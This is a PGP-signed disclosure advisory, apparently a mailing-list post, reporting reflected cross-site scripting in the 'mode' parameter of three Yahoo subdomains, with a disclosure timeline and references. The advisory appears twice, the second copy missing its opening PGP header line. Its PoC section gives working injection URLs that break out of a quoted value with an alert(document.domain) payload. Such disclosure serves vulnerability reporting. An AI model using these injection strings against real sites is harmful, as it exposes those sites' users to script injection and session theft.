-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)
Advisory: Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing
==========================
Vulnerability Description
==========================
The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability
==========================
PoC-Exploit
==========================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
==========================
Disclosure Timeline
==========================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
==========================
Credits
==========================
Vulnerabilities found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----
Hash: SHA1
In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)
Advisory: Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing
==========================
Vulnerability Description
==========================
The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability
==========================
PoC-Exploit
==========================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
==========================
Disclosure Timeline
==========================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
==========================
Credits
==========================
Vulnerabilities found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----
Attached Files:
-
0x62DC6CC0.asc (1.76 KB)